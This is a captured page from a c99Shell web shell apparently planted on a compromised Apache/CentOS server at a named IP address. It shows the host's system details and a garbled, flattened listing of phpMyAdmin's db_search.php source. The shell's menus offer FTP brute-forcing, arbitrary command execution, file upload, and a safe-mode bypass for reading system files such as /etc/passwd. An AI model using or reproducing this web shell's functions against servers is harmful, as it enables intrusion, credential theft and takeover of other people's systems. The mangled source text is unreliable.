110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/ drwxrwxrwx Free 52.6 GB of 127.8 GB (41.15%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/ drwxrwxrwx
Free 52.6 GB of 127.8 GB (41.15%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: db_search.php (11.67 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

*/ require_once('./libraries/common.lib.php'); /** * Gets some core libraries and send headers */ require('./libraries/db_details_common.inc.php'); // If config variable $cfg['Usedbsearch'] is on FALSE : exit. if (!$cfg['UseDbSearch']) { PMA_mysqlDie($strAccessDenied, '', FALSE, $err_url); } // end if $url_query .= '&goto=db_search.php'; $url_params['goto'] = 'db_search.php'; /** * Get the list of tables from the current database */ $tables = PMA_DBI_get_tables($GLOBALS['db']); $num_tables = count( $tables ); /** * Displays top links */ $sub_part = ''; require('./libraries/db_details_links.inc.php'); /** * 1. Main search form has been submitted */ if (isset($_REQUEST['submit_search'])) { /** * Builds the SQL search query * * @param string the table name * @param string the string to search * @param integer type of search (1 -> 1 word at least, 2 -> all words, * 3 -> exact string, 4 -> regexp) * * @return array 3 SQL querys (for count, display and delete results) * * @global string the url to return to in case of errors */ function PMA_getSearchSqls($table, $search_str, $search_option) { global $err_url, $charset_connection; // Statement types $sqlstr_select = 'SELECT'; $sqlstr_delete = 'DELETE'; // Fields to select $res = PMA_DBI_query('SHOW ' . (PMA_MYSQL_INT_VERSION >= 40100 ? 'FULL ' : '') . 'FIELDS FROM ' . PMA_backquote($table) . ' FROM ' . PMA_backquote($GLOBALS['db']) . ';'); while ($current = PMA_DBI_fetch_assoc($res)) { if (PMA_MYSQL_INT_VERSION >= 40100) { list($current['Charset']) = explode('_', $current['Collation']); } $current['Field'] = PMA_backquote($current['Field']); $tblfields[] = $current; } // while PMA_DBI_free_result($res); unset($current, $res); $tblfields_cnt = count($tblfields); // Table to use $sqlstr_from = ' FROM ' . PMA_backquote($GLOBALS['db']) . '.' . PMA_backquote($table); // Beginning of WHERE clause $sqlstr_where = ' WHERE'; $search_words = (($search_option > 2) ? array($search_str) : explode(' ', $search_str)); $search_wds_cnt = count($search_words); $like_or_regex = (($search_option == 4) ? 'REGEXP' : 'LIKE'); $automatic_wildcard = (($search_option <3) ? '%' : ''); for ($i = 0; $i < $search_wds_cnt; $i++) { // Eliminates empty values // In MySQL 4.1, if a field has no collation we get NULL in Charset // but in MySQL 5.0.x we get '' if (!empty($search_words[$i])) { for ($j = 0; $j < $tblfields_cnt; $j++) { if (PMA_MYSQL_INT_VERSION >= 40100 && $tblfields[$j]['Charset'] != $charset_connection && $tblfields[$j]['Charset'] != 'NULL' && $tblfields[$j]['Charset'] != '') { $prefix = 'CONVERT(_utf8 '; $suffix = ' USING ' . $tblfields[$j]['Charset'] . ') COLLATE ' . $tblfields[$j]['Collation']; } else { $prefix = $suffix = ''; } $thefieldlikevalue[] = $tblfields[$j]['Field'] . ' ' . $like_or_regex . ' ' . $prefix . '\'' . $automatic_wildcard . $search_words[$i] . $automatic_wildcard . '\'' . $suffix; } // end for $fieldslikevalues[] = ($search_wds_cnt > 1) ? '(' . implode(' OR ', $thefieldlikevalue) . ')' : implode(' OR ', $thefieldlikevalue); unset($thefieldlikevalue); } // end if } // end for $implode_str = ($search_option == 1 ? ' OR ' : ' AND '); $sqlstr_where .= ' ' . implode($implode_str, $fieldslikevalues); unset($fieldslikevalues); // Builds complete queries $sql['select_fields'] = $sqlstr_select . ' * ' . $sqlstr_from . $sqlstr_where; // here, I think we need to still use the COUNT clause, even for // VIEWs, anyway we have a WHERE clause that should limit results $sql['select_count'] = $sqlstr_select . ' COUNT(*) AS count' . $sqlstr_from . $sqlstr_where; $sql['delete'] = $sqlstr_delete . $sqlstr_from . $sqlstr_where; return $sql; } // end of the "PMA_getSearchSqls()" function /** * Displays the results */ if (!empty($_REQUEST['search_str']) && !empty($_REQUEST['search_option'])) { $original_search_str = $_REQUEST['search_str']; $search_str = PMA_sqlAddslashes($_REQUEST['search_str'], TRUE); // Get the true string to display as option's comment switch ($_REQUEST['search_option']) { case 1: $option_str = ' (' . $strSearchOption1 . ')'; $search_option = 1; break; case 2: $option_str = ' (' . $strSearchOption2 . ')'; $search_option = 2; break; case 3: $option_str = ' (' . $strSearchOption3 . ')'; $search_option = 3; break; case 4: $option_str = ' (' . $strSearchOption4 . ')'; $search_option = 4; break; } // end switch $this_url_params = array( 'db' => $GLOBALS['db'], 'goto' => 'db_details.php', 'pos' => 0, 'is_js_confirmed' => 0, ); // Displays search string echo '
' . "\n" .'' . "\n" .'' . "\n"; $num_search_result_total = 0; $odd_row = true; foreach ( $_REQUEST['table_select'] as $each_table ) { // Gets the SQL statements $newsearchsqls = PMA_getSearchSqls($each_table, $search_str, $search_option); // Executes the "COUNT" statement $res_cnt = PMA_DBI_fetch_value($newsearchsqls['select_count']); $num_search_result_total += $res_cnt; echo '' .'\n"; if ($res_cnt > 0) { $this_url_params['sql_query'] = $newsearchsqls['select_fields']; echo '\n"; $this_url_params['sql_query'] = $newsearchsqls['delete']; echo '\n"; } else { echo '' . "\n" .'' . "\n"; }// end if else $odd_row = ! $odd_row; echo '' . "\n"; } // end for echo '

' . "\n" .sprintf($strSearchResultsFor, htmlspecialchars($original_search_str), $option_str) . "\n" .'
' . sprintf($strNumSearchResultsInTable, $res_cnt, htmlspecialchars($each_table)) . "	' . PMA_linkOrButton( 'sql.php' . PMA_generate_common_url($this_url_params), $strBrowse, '') . "	' . PMA_linkOrButton( 'sql.php' . PMA_generate_common_url($this_url_params), $strDelete, $newsearchsqls['delete']) . "

' . "\n"; if ( count($_REQUEST['table_select']) > 1 ) { echo '

' . sprintf($strNumSearchResultsTotal, $num_search_result_total) . '

' . "\n"; } } // end if (!empty($search_str) && !empty($search_option)) } // end 1. /** * 2. Displays the main search form */ echo "\n"; $searched = (isset($original_search_str)) ? htmlspecialchars($original_search_str) : ''; if (empty($search_option)) { $search_option = 1; } ?>


	/> ¹ /> ¹ /> /> ¹
	' . "\n"; foreach ( $tables as $each_table ) { if ( isset($_REQUEST['unselectall'])) { $is_selected = ''; } elseif ( ! isset($_REQUEST['table_select']) \|\| in_array($each_table, $_REQUEST['table_select']) \|\| isset($_REQUEST['selectall']) ) { $is_selected = ' selected="selected"'; } else { $is_selected = ''; } echo ' ' . "\n"; } // end while echo ' ' . "\n"; $strDoSelectAll = '' . $strSelectAll . '' . ' / ' . '' . $strUnselectAll . ''; ?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--